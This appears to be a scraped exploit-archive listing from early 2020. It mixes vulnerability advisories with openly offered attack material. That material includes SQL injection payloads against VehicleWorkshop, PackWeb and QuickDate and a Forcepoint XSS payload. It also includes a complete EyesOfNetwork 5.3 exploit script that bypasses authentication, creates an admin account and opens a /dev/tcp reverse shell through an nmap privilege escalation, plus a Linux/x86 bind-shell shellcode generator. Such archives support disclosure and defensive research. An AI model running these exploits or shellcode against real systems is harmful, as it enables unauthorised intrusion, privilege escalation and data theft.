↧
macOS/iOS kern_stack_snapshot_internal() Userspace Share Issue
↧
macOS ImageIO JPEG Out-Of-Bounds Write
↧
↧
libx264 H264 Conversion Out-Of-Bounds Write
↧
macOS/iOS XNU mk_timer_create_trap() Race Condition
↧
XNU OUserClient::_sendAsyncResult64() ipc_port Pointer Disclosure
↧
↧
systemd-machined Incorrect Reference Decrement
systemd has an issue in systemd-machined where it decrements the reference count when references are still held.
892461d03b79e21e6c1303c5d998422esystemd: systemd-machined decrements reference count when references still held
I've been looking at the version of systemd shipped in Fedora 31 (approximately ef677436aa203c24816021dd698b57f219f0ff64)
I noticed that systemd-machined caches image objects, and uses reference counting to keep track of them. It removes a reference on error, but it still has a reference in the slot, and you can make it require it by requesting a reply.
For example, a remote non-admin can do this, and it is handled correctly (i.e. correctly denied):
$ dbus-send --system --dest=org.freedesktop.machine1 /org/freedesktop/machine1/image/_2ehost org.freedesktop.machine1.Image.Clone string:invalid boolean:false
But if we request a reply:
$ dbus-send --print-reply --system --dest=org.freedesktop.machine1 /org/freedesktop/machine1/image/_2ehost org.freedesktop.machine1.Image.Clone string:invalid boolean:false
Program received signal SIGSEGV, Segmentation fault.
0x0000556c14d58a69 in bus_image_method_clone (message=0x556c152db930, userdata=0x556c152dbcc0, error=0x7ffd8471c9b0) at ../src/machine/image-dbus.c:144
(gdb) p *image
$2 = {n_ref = 16843372, type = 16, name = 0x360000062b <error: Cannot access memory at address 0x360000062b>,
etc }
image has already hit zero references, and was released. Maybe this affects other objects as well.
I suppose the fix is to check the header for NO_REPLY_EXPECTED, and give it a second reference if not set, but the logic is complicated and maybe you prefer another way.
(To be clear, this is enabled by default on FC31 and accessible to remote, untrusted users)
Tavis.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: taviso@google.com
↧
macOS/iOS ImageIO PVR Image Processing Heap Corruption
↧
macOS/iOS ImageIO PVR Processing Out-Of-Bounds Read
↧
macOS/iOS IOAccelCommandQueue2::processSegmentKernelCommand() Out-Of-Bounds Timestamp Write
↧
↧
usersctp sctp_load_addresses_from_init Out-Of-Bounds Read
usersctp is SCTP library used by a variety of software including WebRTC. There is a vulnerability in the sctp_load_addresses_from_init function of usersctp that can lead to a number of out-of-bound reads. The input to sctp_load_addresses_from_init is verified by calling sctp_arethere_unrecognized_parameters, however there is a difference in how these functions handle parameter bounds. The function sctp_arethere_unrecognized_parameters does not process a parameter that is partially outside of the limit of the chunk, meanwhile, sctp_load_addresses_from_init will continue processing until a parameter that is entirely outside of the chunk occurs. This means that the last parameter of a chunk is not always verified, which can lead to parameters with very short plen values being processed by sctp_load_addresses_from_init. This can lead to out-of-bounds reads whenever the plen is subtracted from the header len.
f7629110af96666d0b8af7e76ecfa60d↧
VehicleWorkshop 1.0 SQL Injection
VehicleWorkshop version 1.0 suffers from a remote SQL injection vulnerability.
33a32b45912823606ad609e132b4f519# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection
# Data: 2020-02-06
# Exploit Author: Mehran Feizi
# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop
# Tested on: Windows
# Google Dork: N/A
=========
Vulnerable Page:
=========
/viewtestdrive.php
==========
Vulnerable Source:
==========
Line6: if(isset($_GET['testid']))
Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'");
Line11: if(isset($_GET['testbid']))
Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'");
Line16: if(isset($_GET['testbida']))
Line:18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'");
=========
POC:
=========
http://site.com/viewtestdrive.php?bookingid=[SQL]
↧
EyesOfNetwork 5.3 Remote Code Execution
EyesOfNetwork version 5.3 suffers from code execution and remote SQL injection vulnerabilities.
bc3327dd510c720ed37f54d8f81edded# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
# Date: 2020-02-01
# Exploit Author: Clément Billac
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656
#!/bin/env python3
# coding: utf8
#
#
# CVE-2020-8654 - Discovery module to allows to run arbitrary OS commands
# We were able to run the 'id' command with the following payload in the target field : ';id #'.
#
# CVE-2020-8655 - LPE via nmap NSE script
# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
# nmap version 6.40 is used and doesn't have the -c and -e options.
#
# CVE-2020-8656 - SQLi in API in getApiKey function on 'username' field
# PoC: /eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '
# Auth bypass: /eonapi/getApiKey?&username=' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '&password=h4knet
# Python imports
import sys, requests, json, os, argparse, socket
from bs4 import BeautifulSoup
# Text colors
txt_yellow = "\033[01;33m"
txt_blue = "\033[01;34m"
txt_red = "\033[01;31m"
txt_green = "\033[01;32m"
txt_bold = "\033[01;01m"
txt_reset = "\033[00m"
txt_info = txt_blue + "[*] " + txt_reset
txt_success = txt_green + "[+] " + txt_reset
txt_warn = txt_yellow + "[!] " + txt_reset
txt_err = txt_red + "[x] " + txt_reset
# Banner
banner = (txt_bold + """
+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE (API v2.4.2) |
| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m |
| |
| Examples: |
| eonrce.py -h |
| eonrce.py http(s)://EyesOfNetwork-URL |
| eonrce.py https://eon.thinc.local -ip 10.11.0.182 -port 3128 |
| eonrce.py https://eon.thinc.local -ip 10.11.0.182 -user pentest2020 |
+-----------------------------------------------------------------------------+
""" + txt_reset)
# Arguments Parser
parser = argparse.ArgumentParser("eonrce", formatter_class=argparse.RawDescriptionHelpFormatter, usage=banner)
parser.add_argument("URL", metavar="URL", help="URL of the EyesOfNetwork server")
parser.add_argument("-ip", metavar="IP", help="Local IP to receive reverse shell", default=socket.gethostbyname(socket.gethostname()))
parser.add_argument("-port", metavar="Port", type=int, help="Local port to listen", default=443)
parser.add_argument("-user", metavar="Username", type=str, help="Name of the new user to create", default='h4ker')
parser.add_argument("-password", metavar="Password", type=str, help="Password of the new user", default='net_was_here')
args = parser.parse_args()
# HTTP Requests config
requests.packages.urllib3.disable_warnings()
baseurl = sys.argv[1].strip('/')
url = baseurl
useragent = 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37'
# Admin user creation variables
new_user = args.user
new_pass = args.password
# Executed command
# The following payload performs both the LPE and the reverse shell in a single command.
# It creates a NSE script in /tmp/h4k wich execute /bin/sh with reverse shell and then perform the nmap scan on localhost with the created NSE script.
# Readable PoC: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end"> /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
ip = args.ip
port = str(args.port)
cmd = '%3Becho+%22local+os+%3D+require+%5C%22os%5C%22+hostrule%3Dfunction%28host%29+os.execute%28%5C%22%2Fbin%2Fsh+-i+%3E%26+%2Fdev%2Ftcp%2F' + ip + '%2F' + port + '+0%3E%261%5C%22%29+end+action%3Dfunction%28%29+end%22+%3E+%2Ftmp%2Fh4k%3Bsudo+%2Fusr%2Fbin%2Fnmap+localhost+-p+1337+-script+%2Ftmp%2Fh4k+%23'
# Exploit banner
print (txt_bold,"""+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE (API v2.4.2) |
| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m |
+-----------------------------------------------------------------------------+
""", txt_reset, sep = '')
# Check if it's a EyesOfNetwork login page.
r = requests.get(baseurl, verify=False, headers={'user-agent':useragent})
if r.status_code == 200 and r.text.find('<title>EyesOfNetwork</title>') != -1 and r.text.find('form action="login.php" method="POST">') != -1:
print(txt_info, "EyesOfNetwork login page found", sep = '')
else:
print(txt_err, 'EyesOfNetwork login page not found', sep = '')
quit()
# Check for accessible EON API
url = baseurl + '/eonapi/getApiKey'
r = requests.get(url, verify=False, headers={'user-agent':useragent})
if r.status_code == 401 and 'api_version' in r.json().keys() and 'http_code' in r.json().keys():
print(txt_info, 'EyesOfNetwork API page found. API version: ',txt_bold , r.json()['api_version'], txt_reset, sep = '')
else:
print(txt_warn, 'EyesOfNetwork API page not found', sep = '')
quit()
# SQL injection with authentication bypass
url = baseurl + '/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet'
r = requests.get(url, verify=False, headers={'user-agent':useragent})
if r.status_code == 200 and 'EONAPI_KEY' in r.json().keys():
print(txt_success, 'Admin user key obtained: ', txt_bold, r.json()['EONAPI_KEY'], txt_reset, sep = '')
else:
print(txt_err, 'The host seems patched or unexploitable', sep = '')
print(txt_warn, 'Did you specified http instead of https in the URL ?', sep = '')
print(txt_warn, 'You can check manually the SQLi with the following payload: ', txt_bold, "/eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '", txt_reset, sep = '')
quit()
# Adding new administrator
url = sys.argv[1].strip('/') + '/eonapi/createEonUser?username=admin&apiKey=' + r.json()['EONAPI_KEY']
r = requests.post(url, verify=False, headers={'user-agent':useragent}, json={"user_name":new_user,"user_group":"admins","user_password":new_pass})
if r.status_code == 200 and 'result' in r.json().keys():
if r.json()['result']['code'] == 0 and 'SUCCESS' in r.json()['result']['description']:
id = r.json()['result']['description'].split('ID = ', 1)[1].split(']')[0]
print(txt_success, 'New user ', txt_bold, new_user, txt_reset, ' successfully created. ID:', txt_bold, id, txt_reset, sep = '')
elif r.json()['result']['code'] == 1:
if ' already exist.' in r.json()['result']['description']:
print(txt_warn, 'The user ', txt_bold, new_user, txt_reset, ' already exists', sep = '')
else:
print(txt_err, 'An error occured while querying the API. Unexpected description message: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '')
quit()
else:
print(txt_err, 'An error occured while querying the API. Unepected result code. Description: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '')
quit()
else:
print(txt_err, 'An error occured while querying the API. Missing result value in JSON response or unexpected HTTP status response', sep = '')
quit()
# Authentication with our new user
url = baseurl + '/login.php'
auth_data = 'login=' + new_user + '&mdp=' +new_pass
auth_req = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, data=auth_data)
if auth_req.status_code == 200 and 'Set-Cookie' in auth_req.headers:
print(txt_success, 'Successfully authenticated', sep = '')
else:
print(txt_err, 'Error while authenticating. We expect to receive Set-Cookie headers uppon successful authentication', sep = '')
quit()
# Creating Discovery job
url = baseurl + '/lilac/autodiscovery.php'
job_command = 'request=autodiscover&job_name=Internal+discovery&job_description=Internal+EON+discovery+procedure.&nmap_binary=%2Fusr%2Fbin%2Fnmap&default_template=&target%5B2%5D=' + cmd
r = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, cookies=auth_req.cookies, data=job_command)
if r.status_code == 200 and r.text.find('Starting...') != -1:
job_id = str(BeautifulSoup(r.content, "html.parser").find(id="completemsg")).split('?id=', 1)[1].split('&rev')[0]
print(txt_success, 'Discovery job successfully created with ID: ', txt_bold, job_id, txt_reset, sep = '')
else:
print(txt_err, 'Error while creating the discovery job', sep = '')
quit()
# Launching listener
print(txt_info, 'Spawning netcat listener:', txt_bold)
nc_command = '/usr/bin/nc -lnvp' + port + ' -s ' + ip
os.system(nc_command)
print(txt_reset)
# Removing job
url = baseurl + '/lilac/autodiscovery.php?id=' + job_id + '&delete=1'
r = requests.get(url, verify=False, headers={'user-agent':useragent}, cookies=auth_req.cookies)
if r.status_code == 200 and r.text.find('Removed Job') != -1:
print(txt_info, 'Job ', job_id, ' removed', sep = '')
else:
print(txt_err, 'Error while removing the job', sep = '')
quit()
↧
Dota 2 7.23f Denial Of Service
Dota 2 version 7.23f suffers from a denial of service vulnerability.
2e6effeebad9ec3e55d55eb48ed417cb# Exploit Title: Dota 2 7.23f - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-02-05
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) (bi7s)
# Vendor Homepage: https://www.valvesoftware.com/en/
# Software Link: N/A
# Version: 7.23f
# Tested on: Windows 10 (x64)
# CVE : CVE-2020-7949
Valve Dota 2 (schemasystem.dll) before 7.23f allows remote attackers to
achieve code execution or denial of service by creating a gaming server and
inviting a victim to this server, because a crafted map is mishandled
during a GetValue call.
Attacker need invite a victim to play on attacker game server using
specially crafted map or create custom game, then when initialize the game
of the victim, the specially crafted map will be automatically downloaded
and processed by the victim, which will lead to the possibility to exploit
vulnerability. Also attacker can create custom map and upload it to Steam
<https://steamcommunity.com/sharedfiles/filedetails/?id=328258382>.
Steps for reproduce:
1. Copy attached file zuff.vpk (
https://github.com/bi7s/CVE/blob/master/CVE-2020-7949/zuff.zip) to map
directory (C:\Program Files (x86)\Steam\steamapps\common\dota 2
beta\game\dota\maps)
2. Launch Dota2
3. Launch "zuff" map from Dota2 game console. Command for game console =
map zuff
4. Dota2 is crash (Access Violation)
Debug information:
(2098.1634): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\Program Files (x86)\Steam\steamapps\common\dota 2
beta\game\bin\win64\schemasystem.dll -
(2098.1634): Access violation - code c0000005 (!!! second chance !!!)
rax=00000000ffffffff rbx=0000027ba23dd9b6 rcx=0000027ba23dd9b6
rdx=0000000042424242 rsi=0000027b5ffb9774 rdi=0000000000000000
rip=00007ffa73af90ce rsp=000000e82bcfe900 rbp=0000000000000000
r8=00000000412ee51c r9=000000e82bcfea88 r10=0000027b5ffb9774
r11=00000000412ee51c r12=0000027b5ffbe582 r13=000000e82bcfe9f0
r14=0000027b5ffb5328 r15=0000000000000010
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
schemasystem!BinaryProperties_GetValue+0x10ae:
00007ffa`73af90ce 40383b cmp byte ptr [rbx],dil
ds:0000027b`a23dd9b6=??
↧
↧
PackWeb Formap E-learning 1.0 SQL Injection
PackWeb Formap E-learning version 1.0 suffers from a remote SQL injection vulnerability.
6c1dbdb44fb300528dd1ae9b45081486# Exploit Title: PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection
# Google Dork: intitle: "PackWeb Formap E-learning"
# Date: 2020-02-07
# Exploit Author: Amel BOUZIANE-LEBLOND
# Vendor Homepage: https://www.ediser.com/
# Software Link: https://www.ediser.com/98517-formation-en-ligne
# Version: v1.0
# Tested on: Linux
# CVE : N/A
# Description:
# The PackWeb Formap E-learning application from EDISER is vulnerable to
# SQL injection via the 'NumCours' parameter on the eleve_cours.php
==================== 1. SQLi ====================
http://localhost/eleve_cours.php?NumCours=[SQLI]
The 'NumCours' parameter is vulnerable to SQL injection.
GET parameter 'NumCours' is vulnerable.
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1
Type: UNION query
Title: MySQL UNION query (47) - 1 column
Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
↧
Linux/x86 Bind Shell Generator Shellcode
114 bytes small Linux/x86 bind shell generator shellcode.
9b7bafc7ff4aa9cacdbde1039bca23ca# Title: Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
# Author: Bobby Cooke
# Date: 2020-01-29
# Tested On: Ubuntu 3.13.0-32-generic #57~precise1-Ubuntu i386
#!/usr/bin/python
# Take users TCP port as input
port = raw_input("Enter TCP Port Number: ")
# Convert input string to an integer
deciPort = int(port)
# Format the integer to Hex Integer
hexPort = "{:02x}".format(deciPort)
#print "Hex value of Decimal Number:",hexPort
# Check the length of the output hex string
hexStrLen = len(hexPort)
# Check if the hex string is even or odd with modulus 2
oddEven = hexStrLen % 2
# if it returns 1 then it's odd. We need to add a leading 0
if oddEven == 1:
hexPort = "0" + hexPort
# converts the port number into the correct hex format
tcpPort = "\\x".join(hexPort[i:i+2] for i in range(0,len(hexPort), 2))
print "Your TCP Port in Hex is:","\\x"+tcpPort
nullCheck = deciPort % 256
if nullCheck == 0 :
print "Your TCP Port contains a Null 0x00."
print "Try again with a different Port Number."
exit(0)
# 1. Create a new Socket
# <socketcall> ipv4Socket = socket( AF_INET, SOCK_STREAM, 0 );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 = "\x31\xc0" # xor eax, eax; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x01" # mov bl, 0x1; EBX is set to create a socket
scPart1 += "\x31\xc9" # xor ecx, ecx; This sets the ECX Register to NULL (all zeros).
scPart1 += "\x51" # push ecx; ECX[2]. ECX is NULL
scPart1 += "\x53" # push ebx; ECX[1]. EBX already has the value we need for ECX[1]
scPart1 += "\x6a\x02" # push dword 0x2 ; ECX[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart1 += "\x89\xe1" # mov ecx, esp ; ECX now holds the pointer to the arg array
scPart1 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes socket().
scPart1 += "\x96" # xchg esi, eax ; After the SYSCAL, sockfd is stored in the EAX Register, save in ESI
# 2. Create TCP-IP Address and Bind the Address to the Socket
# struct sockaddr_in ipSocketAddr = {
# .sin_family = AF_INET, .sin_port = htons(4444), .sin_addr.s_addr = INADDR_ANY};
# ARG[0] ARG[1] ARG[2]
#<socketcall> bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x02" # mov bl, 0x2 ; EBX is set to create a socket
scPart1 += "\x31\xd2" # xor edx, edx ; This sets the EDX Register to NULL (all zeros).
scPart1 += "\x52" # push edx ; ARG[2]. EDX is NULL, the value needed for INADDR_ANY.
scPart1 += "\x66\x68" # push word 0x?? ; ; ARG[1]. This is for the TCP Port #
#tcpPort = "\x11\x5c" # TCP Port 4444 = 0x5c11
scPart2 = "\x66\x53" # push bx ; ARG[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x89\xe1" # mov ecx, esp ; Save the memory location of ARG[0] into the EDX Register.
scPart2 += "\x6a\x10" # push 0x10 ; ECX[2]. Our Struct of ARG's is now 16 bytes long (0x10 in Hex).
scPart2 += "\x51" # push ecx ; ECX[1]. The pointer to the beginning of the struct we saved
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Now we need to point ECX to the top of the loaded stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
# 4. Listen for incoming connections on TCP-IP Socket.
# <socketcall> listen( ipv4Socket, 0 );
# EAX=0x66 EBX ECX[0] ECX[1]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x04" # mov bl, 0x4 ; EBX is set to listen().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; Executes listen(). Allowing us to handle incoming TCP-IP Connections.
# 5. Accept the incoming connection, and create a connected session.
# <socketcall> clientSocket = accept( ipv4Socket, NULL, NULL );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x05" # mov bl, 0x5 ; EBX is set to accept().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[2]. Push the value 0x0 to the stack.
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
scPart2 += "\x93" # xchg ebx, eax ; The created clientSocket is stored in EAX after receiving a connection.
# 6. Transfer STDIN, STDOUT, STDERR to the connected Socket.
# dup2( clientSocket, 0 ); // STDIN
# dup2( clientSocket, 1 ); // STDOUT
# dup2( clientSocket, 2 ); // STDERR
# EAX EBX ECX
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\xb1\x02" # mov cl, 0x2 ; This sets the loop counter, and
# ; will also be the value of "int newfd" for the 3 dup2 SYSCAL's.
#dup2Loop: ; Procedure label for the dup2 Loop.
scPart2 += "\xb0\x3f" # mov al, 0x3f ; EAX is now 0x0000003F = SYSCALL 63 - dup2
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes accept().
# ; Allowing us to create connected Sockets.
scPart2 += "\x49" # dec ecx ; Decrements ECX by 1
scPart2 += "\x79\xf9" # jns dup2Loop /jns short -5 ; Jump back to the dup2Loop Procedure until ECX equals 0.
# 7. Spawn a "/bin/sh" shell for the client, in the connected session.
# execve("/bin//sh", NULL, NULL);
# EAX EBX ECX EDX
scPart2 += "\x52" # push edx ; Push NULL to terminate the string.
scPart2 += "\x68\x2f\x2f\x73\x68" # push 0x68732f2f ; "hs//" - Needs to be 4 bytes to fit on stack properly
scPart2 += "\x68\x2f\x62\x69\x6e" # push 0x6e69622f ; "nib/" - This is "/bin//sh" backwards.
scPart2 += "\x89\xe3" # mov ebx, esp ; point ebx to stack where /bin//sh +\x00 is located
scPart2 += "\x89\xd1" # mov ecx, edx ; NULL
scPart2 += "\xb0\x0b" # mov al, 0xb ; execve System Call Number - 11
scPart2 += "\xcd\x80" # int 0x80 ; execute execve with system call interrupt
# Initiate the Shellcode variable we will output
shellcode = ""
# Add the first part of the tcp bind shellcode
for x in bytearray(scPart1) :
shellcode += '\\x'
shellcode += '%02x' %x
# Add the user added tcp port to the shellcode
shellcode += "\\x"+tcpPort
# Add the second part of the tcp bind shellcode
for x in bytearray(scPart2) :
shellcode += '\\x'
shellcode += '%02x' %x
print "Choose your shellcode export format."
exportFormat = raw_input("[1] = C Format\n[2] = Python Format\n[1]: ")
if exportFormat == "2" :
formatSC = '"\nshellcode += "'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[-----------------------Your-Shellcode------------------------]"
print 'shellcode = "'+formatSC+'"'
else :
formatSC = '"\n"'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[----------------Your-Shellcode------------------]"
print ' unsigned char shellcode[] = \\\n"'+formatSC+'";'
↧
Forcepoint WebSecurity 8.5 Cross Site Scripting
Forcepoint WebSecurity version 8.5 suffers from a cross site scripting vulnerability.
141e6e362032cd8686d01406f6b26649# Exploit Title: Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
# Exploit Author: Prasenjit Kanti Paul
# Vendor Homepage: https://www.forcepoint.com/
# Software Link: https://www.forcepoint.com/product/cloud-security/web-security
# Version: Forcepoint Web Security 8.5
# Tested on: Windows 7,10 and Linux Mint
# CVE : CVE-2019-6146
# ForcePoint KBA: https://support.forcepoint.com/KBArticle?id=000017702
# Video PoC: https://youtu.be/NfXGaNVK6eE
# Description: User must visit any site which is restricted as per
# forcepoint policy. So that forcepoint web security will show a generic
# page. While parsing "Domain Name" within generic page forcepoint is not
# validating Host header, which caused XSS.
Lets assume, while accessing anysite.com, forcepoint web security prevents
us to go to that website with its custom exception/blocking page. Now
follow the steps below:
*Steps*:
1. Intercept the traffic while accessing https://anysite.com
2. Modify the Host header from anysite.com to ">
<script>alert("evilsite")</script>
*Timeline:*
- Oct. 21, 2019 - Issue Reported to PSIRT team of ForcePoint
- Oct. 23, 2019 - ForcePoint team confirms the issue
- Oct. 24, 2019 - CVE-2019-6146 has been assigned
- Jan. 23, 2020 - ForcePoint KBA has been published with proper fixes
*Regards,*
*Prasenjit Kanti Paul*
↧
QuickDate 1.3.2 SQL Injection
QuickDate version 1.3.2 suffers from a remote SQL injection vulnerability.
f2edf1bbfd6b35a274e7d0fc1835c365# Exploit Title: QuickDate 1.3.2 - SQL Injection
# Dork: N/A
# Date: 2020-02-07
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://quickdatescript.com/
# Version: 1.3.2
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
#
POST /find_matches HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 425
Cookie: quickdating=a50b670982b01b4f0608a60217309d11; mode=night; JWT=a0823ac00ff28243d0c8caa841ebacd55bbf6d40f571d45bfb0f504e8b0b13be16222ee080568613ca7be8306ecc3f5fa30ff2c41e64fa7b
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
_located=-7 UNION ALL SELECT%2BCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113-- -
#
#
HTTP/1.1 200 OK
Date: Thu, 06 Feb 2020 15:05:34 GMT
Server: Apache
Connection: Keep-alive, close
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: application/json; charset=UTF-8
Content-Length: 3844
{"status":200,"page":1,"post":"{\"_located\":\"-7 UNION AL...... class=\"btn waves-effect dislike _dislike_textdate_main@localhost : date_main : 10.2.31-MariaDB\".......","where":"","message":"OK","can_send":1}
#
↧
↧
Google Invisible RECAPTCHA 3 Spoof Bypass
Google Invisible RECAPTCHA version 3 suffers from a spoofing bypass vulnerability.
03e20cd2aa23071dfe0c93c4d8a7b255# Exploit Title: Google Invisible RECAPTCHA 3 - Spoof Bypass
# Date: 2020-02-07
# Vendor Homepage: https://developers.google.com/recaptcha/docs/invisible
# Exploit Git Repo: https://github.com/matamorphosis/Browser-Exploits/tree/master/RECAPTCHA_Bypass
# Exploit Author: Matamorphosis
# Tested on: Windows and Ubuntu 19.10
# Category: Web Apps
--------------------------------------------------------------------------------------------
RECAPTCHA Bypass:
--------------------------------------------------------------------------------------------
This tool allows a user to bypass Version 3 of Google's Invisible RECAPTCHA by creating a spoofed web app that leverages the same RECAPTCHA, by providing the victims site key.
What makes a site vulnerable?
1. They are using Version 3 of Google's Invisible RECAPTCHA
2. They allow the site key to be used on "localhost". However, while currently untested you could try adding the DNS name of the target you are attacking and try resolving it to 127.0.0.1 in your hosts file.
NOTE: Exploit users need to have a functional understanding of both Python and JavaScript to make the necessary changes to run this exploit.
--------------------------------------------------------------------------------------------
PREREQUISITES:
--------------------------------------------------------------------------------------------
The instructions supplied are written for Debian-based Linux distributions. However, this can be setup on any OS with relative ease.
1. Download and install Firefox located at https://www.mozilla.org/en-US/firefox/new/
